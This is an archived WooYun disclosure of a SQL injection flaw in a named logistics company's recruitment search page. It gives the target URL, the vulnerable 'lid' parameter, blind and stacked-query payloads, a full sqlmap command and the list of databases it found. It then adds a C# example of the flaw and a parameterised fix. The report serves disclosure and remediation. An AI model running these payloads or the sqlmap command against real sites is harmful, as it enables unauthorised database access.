WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2014-09-25: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2014-11-09: The vendor has actively ignored the vulnerability; details disclosed to the public.
Injection vulnerability on a logistics company's main site; the OA and BBS sit in the same database
Injection point:
http://www.uc56.com:80/cn/job/recruitments
Injection method:
POST
POST data:
keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-1&tid=
Injected parameter:
lid
Payload:
keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-9789' OR (9790=9790) AND 'WeDl'='WeDl&tid=
root@hack[x:\sqlmap]# sqlmap.py -u "http://www.uc56.com:80/cn/job/recruitments" --data "keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-1&tid=" -p "lid" --level 2 --risk 2 --hex --threads 6 -v 3 --dbms "mssql" --dbs
---
Place: POST
Parameter: lid
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-9789' OR (9790=9790) AND 'WeDl'='WeDl&tid=
    Vector: OR ([INFERENCE])

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-1'; WAITFOR DELAY '0:0:5'--&tid=
    Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keyword_input=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&lid=-1' WAITFOR DELAY '0:0:5'--&tid=
    Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web server operating system: Windows
web application technology: ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server 2008
available databases [10]:
[*] *
[*] 0x6d0061007300740
[*] \cOa
[*] model
[*] msdb
[*] SYSUNC
[*] tempdb
[*] ucbbs
[*] UcSoa
[*] ucweb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Fix: filter the lid parameter according to its type.
Unable to contact the vendor, or the vendor actively declined.
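The defect behind this finding and the fix the report recommends (check that lid is the integer it is meant to be, then bind it as a typed parameter), as an added C# example that is not code from the report or from the vendor's site. The ASP.NET/SQL Server stack is taken from the sqlmap banner above; the table and column names (recruitments, lid, title) and the handler shape are assumptions.

```csharp
// Assumed (not the vendor's code): ASP.NET 4.0 + SQL Server via SqlClient, with
// hypothetical table/column names recruitments, lid, title.
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;
using System.Web;

public static class RecruitmentsSearch
{
    // VULNERABLE (the pattern behind the finding): lid is spliced into the SQL text, so a
    // value that closes the quote and adds a condition, or ';' plus a second statement, runs as SQL.
    public static string BuildQueryUnsafe(string keyword, string lid)
    {
        return "SELECT title FROM recruitments WHERE lid = '" + lid +
               "' AND title LIKE '%" + keyword + "%'";
    }

    // FIX step 1: lid is a numeric list id (-1 in the normal request), so only an
    // integer is accepted; anything containing quotes, spaces or SQL fails here.
    public static bool TryParseListId(string raw, out int lid)
    {
        return int.TryParse(raw, NumberStyles.AllowLeadingSign,
                            CultureInfo.InvariantCulture, out lid);
    }
    // FIX step 2: values are bound as typed parameters; the query text is a constant.
    public static List<string> Search(SqlConnection conn, string keyword, int lid)
    {
        const string sql = "SELECT title FROM recruitments " +
                           "WHERE (@lid = -1 OR lid = @lid) AND title LIKE @kw";
        var titles = new List<string>();
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@lid", SqlDbType.Int).Value = lid;
            cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 102).Value = "%" + keyword + "%";
            using (SqlDataReader rd = cmd.ExecuteReader())
                while (rd.Read())
                    titles.Add(rd.GetString(0));
        }
        return titles;
    }
    // Handler entry: a malformed lid gets HTTP 400 before any database call is made.
    public static void Handle(HttpContext ctx, SqlConnection conn)
    {
        int lid;
        if (!TryParseListId(ctx.Request.Form["lid"], out lid)) { ctx.Response.StatusCode = 400; return; }
        foreach (string t in Search(conn, ctx.Request.Form["keyword_input"] ?? "", lid))
            ctx.Response.Write(HttpUtility.HtmlEncode(t) + "<br/>");
    }
}
```

The database list in the sqlmap output also shows that the site's database login could see the OA and BBS databases; a separate login per application with rights only on its own database limits what a single injection like this one can reach.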